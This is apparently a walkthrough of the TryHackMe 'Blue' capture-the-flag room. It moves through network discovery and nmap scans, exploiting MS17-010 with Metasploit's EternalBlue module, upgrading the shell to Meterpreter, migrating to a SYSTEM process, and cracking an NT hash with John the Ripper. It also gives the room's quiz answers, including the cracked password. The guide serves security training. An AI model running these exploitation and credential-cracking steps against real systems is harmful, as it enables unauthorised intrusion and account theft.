Tryhackme Blue Walkthrough

Room Link: https://tryhackme.com/room/blue

discovery

we don't know the IP of the target so let's do a netdiscover scan to do it.

sudo netdiscover -i eth0 -r 10.0.2.0/24

now we know the IP of the target 10.0.2.21

enumeration

now lets first do a Nmap scan.

sudo nmap -sC -sV -A (the targets IP) -oN nmap.txt

first question: How many ports are open with a port number under 1000?

ans: 3

second question: What is this machine vulnerable to? (Answer in the form of:

ms??-???, ex: ms08–067)?

for this let's do script scan.

sudo nmap -sC -A — script=vuln (IP address) -oN scriptscan.txt

note: this will take some time.

ans: ms17–010

exploitation

we have found that the machine is vulnerable to ms17–010.

so lets search for the Metasploit module.

searchsploit ms17–010

https://www.rapid7.com/db/modules/exploit/windows/smb/

ms17_010_eternalblue/

and now we found that the Metasploit module is. exploit/windows/smb/

ms17_010_eternalblue.

3/11

third question: Find the exploitation code we will run against the machine.

What is the full path of the code? (Ex: exploit/……..)

ans: exploit/windows/smb/ms17_010_eternalblue

now let us start Metasploit,

msfconsole

now let us use the module

use exploit/windows/smb/ms17_010_eternalblue

now let us set the options.

type options

4th question: Show options and set the one required value. What is

the name of this value? (All caps for submission)

ans: RHOSTS

now lets set the RHOSTS, LHOST and the LPORT(optional)

set RHOSTS (IP of the target)

set LHOST (IP of your machine)

HOHO now we are ready to run the exploit type “run” to do it.

WOW, now we are in.

now let us background this and upgrade this shell to a meterpreter session for

more anonymity and more control.

to do it press ctrl+z

it is now done.

escalation

question 5: If you haven’t already, background the previously

gained shell (CTRL + Z). Research online on how to convert a shell

to meterpreter shell in Metasploit. What is the name of the post

the module we will use? (Exact path, similar to the exploit we

previously selected)

now to find this search for shell_to_meterpreter in msfconsole

ans: post/multi/manage/shell_to_meterpreter

now let's use this post module

by typing “use post/multi/manage/shell_to_meterpreter”

now let us see what options we need to set by typing “options”

now we know that we need to set sessions option because we already have

the session running in the background

question 6: Select this (use MODULE_PATH). Show options, what

option are we required to change? (All caps for answer)

ans: “SESSION”

now let us do this by searching for active sessions by typing “sessions”

now set the session by typing “set SESSION 1”

now type run to execute it

now we are good to go again list sessions and switch to meterpreter

session by typing “sessions -i 2”

now we are in

hooorayyyy

now let us migrate to a process running at NT AUTHORITY\SYSTEM

to do this first list all the processes by typing “ps”

now let us migrate to 1828 by typing “migrate 1828”

now we got password hashes of the user named Jon.

now let us crack the hash using john the ripper

to do that make a txt file and type the hash you got

now use the command

“john hash.txt -wordlist=usr/share/wordlists/rockyou.txt -format=NT”

and then to show the password type john hash.txt — show — format=NT

question 7: Copy this password hash to a file and research how to

crack it. What is the cracked password?

ans: alqfna22

flag finding

now let us find the flags

the first flag is found in C:\

to get it first got to the shell by typing “shell”

now list the files by typing “dir”

you can see the flag1.txt to read the flags use the command type

now let us find the second flag

second flags location is

\Windows\System32\config

the third flag is located in

\Users\Jon\Documents

Thanks,